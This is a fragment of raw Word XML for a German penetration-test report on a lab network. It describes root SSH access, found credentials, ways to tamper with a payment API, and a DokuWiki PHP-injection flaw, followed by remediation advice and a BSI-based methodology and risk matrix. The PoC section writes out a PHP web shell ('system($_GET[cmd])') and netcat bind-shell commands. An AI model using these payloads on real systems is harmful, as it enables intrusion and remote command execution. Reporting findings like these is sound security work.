          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">csimmons </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">verbinden, da ihr Passwort auf einem Post-It im Hintergrund eines Fotos sichtbar war. Des Weiteren kann dies bei schwachen Passwörtern auch sehr schnell mit Wörterlisten erreicht werden.</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Anhand der folgenden Informationen sehen wir das csimmons als root eingeloggt ist und wir uns somit einen privilegierten Zugang verschaffen haben.</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3176758"/>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57638" cy="317675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5.8: SSH Verbindung mit root zu 10.250.53.36</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diesem Rechner finden wir eine ganze Reihe an Informationen über andere Systeme. Es wurde eine Datenbank mit Zugangsdaten gefunden.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2672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5.9:  Database Config</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einem Shell-Script wurden alle Adressen im Subnetz überprüft und es konnten drei weitere Systeme gefunden werden.</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2200275"/>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4291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5.10: Clients im Privaten Netzwerk</w:t>
      </w:r>
    </w:p>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Backend für die Anwendung der Schnittstelle im Paygate wurde ausfindig gemacht. Diesen können wir modifizieren und mit modifizierten Queries die Daten auf dem System zwischenspeichern und anschließend auf unseren Rechner übertragen. Alternativ kann man Zahlungen durch Modifizierung der Queries umleiten oder die Entfernung von </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@oauth.require_oauth('admin')</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> die Authentifizierungsfunktion für die Anfragen ausschalten.</w:t>
      </w:r>
    </w:p>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7498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5.11: API Backend Python-Datei</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Durch Modifizierung der Seite kann Phishing betrieben werden, indem man Eingabefelder abfangt.</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9149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5.12: Modifizierung von HTML</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Empfehlung:</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Passwörter dürfen nicht personenbezogen sein, eine Mindestlänge haben, Groß- und Kleinbuchstaben, Zahlen und Sonderzeichen beinhalten. Zudem sollten Passwörter regelmäßig geändert werden.</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Benutzernamen dürfen keine Rückschlüsse auf Personen oder Rollen zulassen.</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müssen zudem automatische Sicherheitssysteme implementiert werden, die Durchbrüche rechtzeitig erkennen und verhindern können. Dazu gehört auch ein aktives Incident-Management.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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_j766a29mpeoe" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kvq72t7vwjpj" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1.7 PHP-Injection</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Beschreibung</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 dem System 10.250.53.35 (Dokuwiki) kann jeder Besucher die Seite </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">todo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bearbeiten. Die Seitenbearbeitung ist jedoch anfällig gegenüber Injection-Angriffe über die $_GET Parameter. PHP-Befehle werden nicht escaped, sondern auf dem Host-System ausgeführt. Jeder Besucher kann somit Systembefehle ausführen.</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Auswirkung</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Angreifer erhalten durch die Injection Zugang zum System mit der Benutzergruppe der Anwendung, die die Seite hostet. Die Webanwendung kann vollständig manipuliert werden (vgl. 5.1.6).  Es kann auch zunächst beispielsweise eine Shell an einen Port gebunden werden, welche von außen erreichbar und nutzbar wäre. Je nach Berechtigung der Webanwendung kann ein Angreifer durch andere Schwachstellen das ganze System übernehmen oder das System mindestens als Proxy nutzen, um sich in private Netzwerke zu begeben.</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Proof of Concept</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einen privilegierten Zugang zu dem System 10.250.53.34 zu erhalten, müssen wir auf einer beliebigen Seite die Zeile </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_GET[cmd]); ?&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> einfügen. Diese führt eine Shell aus, dessen Eingabe aus dem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$_GET</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameter “cmd” gelesen wird. Über die URL können wir den Parameter beliebig setzen und Befehle ausführen. Um uns als Angreifer die Arbeit zu erleichtern binden wir eine Shell an den Port 4444. Wir definieren also “cmd=nc -lvp 4444 -e /bin/sh” in der URL.</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957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5.13: PHP-Injection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 nächstes verbinden wir uns mit unserer Angreifermaschine auf das Ziel mit dem Befehl </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nv &lt;IP Address&gt; 4444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2876550"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="13" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect b="13715" l="0" r="38538" t="10972"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="35242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5.14: Netcat Bind-Shell </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Empfehlung:</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 Eingabestrings müssen Escaped werden und Sonderzeichen ersetzt werden. Inline Java-Script und PHP müssen vermieden werden.</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r9iw61qaqnwb" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6 Anhang</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ihotpi4p94s2" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Vorgehensweise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Vorgehensweise ist an die Studie “Durchführungskonzept für Penetrationstests” des Bundesamt für Sicherheit in der Informationstechnik (BSI) angelehnt und unterteilt sich in verschiedene Phasen:</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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ufpczhj2mc89" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.1 Information Gathering:</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 öffentlich Zugänglichen Informationen über das Ziel werden durchsucht. Darunter zählen auch ihre Mitarbeiter über Sozialen Medien.</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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5m6bq9l68gwc" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Netzwerkscan der Zielsysteme und ihrer Dienste:</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 Netzwerke und ihre Ports werden gescannt und identifiziert. Anhand der offenen Ports können wir Anwendungen und Dienste identifizieren, die als potenzielle Zugangspunkte dienen könnten.</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59300"/>
            <wp:effectExtent b="0" l="0" r="0" t="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40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6.1: Domain Auflistung</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2276475"/>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435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6.2: Dienste (Ports) identifizieren</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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dt286vhm917w" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3 Analyse der Webanwendungen:</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dem Browser werden alle Systeme durchsucht und nach üblichen Schwachstellen Ausschau gehalten. Es wird Recherchiert welche Schwachstellen über die Webanwendungen schon bekannt sind. Oft werden Anwendungen spät oder gar nicht gepatcht. Versteckte Verzeichnisse werden mit Programmen wie </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dirb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> aufgedeckt.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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vyw82x2vzhao" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4 Identifizierung von Schwachstellen:</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werden Schwachstellen identifiziert und Abwägungen über ihre Nutzen/Risiko getätigt. Zudem werden spezifische Ziele definiert.</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Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mx4b7msdfg57" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5 Ausnutzen der Schwachstellen:</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Schwachstellen werden angegriffen. Idealerweise wird dadurch Zugang zum System erlangt.</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Style w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_pthsoo3xounp" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.6 Privilegienausweitung</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werden Möglichkeiten gesucht uneingeschränkten Zugang im System zu erlangen. Es wird überprüft welche neuen Möglichkeiten dadurch entstanden sind. Das System wird zudem genutzt um neue Systeme zu identifizieren und anzugreifen. Idealerweise schafft man es bis in das Datenbanksystem zu gelangen.</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ndmzyff2z1we" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1.7 Abschlussbericht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wird ein vertrauliches Dokument erstellt mit den Schwachstellen und Handlungsempfehlungen, um diese zu beseitigen.</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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ys2t70sas8dp" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Risikobewertung</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Risiko setzt sich aus der Eintrittswahrscheinlichkeit und dem Schadensausmaß zusammen</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423562"/>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228975" cy="242356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Abbildung 6.3: Risikobewertungsmatrix</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Faktoren für Eintrittswahrscheinlichkeit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Wie einfach kann die Schwachstelle identifiziert werden? Sind Vulnerability Scanner erfolgreich? (Visibility)</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Existieren vorgefertigte Exploits, die jedem Angreifer frei zugänglich sind? (Exploitability)</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Setzt die Ausnutzung der Schwachstelle bestimmte Rechte voraus? (Privilege Escalation)</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Sind vorausgehende Schwachstellen notwendig? (Vulnerability Chaining)</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Ist die Ursache des Schadenseintritts auf menschliche Fehler zurückzuführen? (Social Engineering)</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c81c15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hoch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] Die Schwachstelle ist oﬀensichtlich oder Exploits sind frei verfügbar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001BC">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ffbf00"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mittel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] Die Schwachstelle ist in angemessener Zeit zu entdecken, Exploits müssen eventuell angepasst werden.</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208434"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gering</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] Die Schwachstelle ist aufwendig zu ﬁnden und Exploits müssen erstellt werden.</w:t>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Faktoren für Schadensausmaß</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Auswirkungen auf die Geschäftstätigkeit</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Schäden durch Verlust von: Vertraulichkeit, Integrität, Verfügbarkeit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Personenschäden oder Persönlichkeitsrechtsverletzungen</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c81c15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hoch</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] Verletzung der Sicherheitsziele in Bezug auf Informationen oder IT-Systeme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C5">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ffbf00"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mittel</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] Umgehung von Schutzmechanismen</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208434"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Gering</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="212529"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ] Informationslücke</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId26" w:type="default"/>
      <w:footerReference r:id="rId27"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2"/>
      <w:szCs w:val="32"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>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image" Target="media/image13.pn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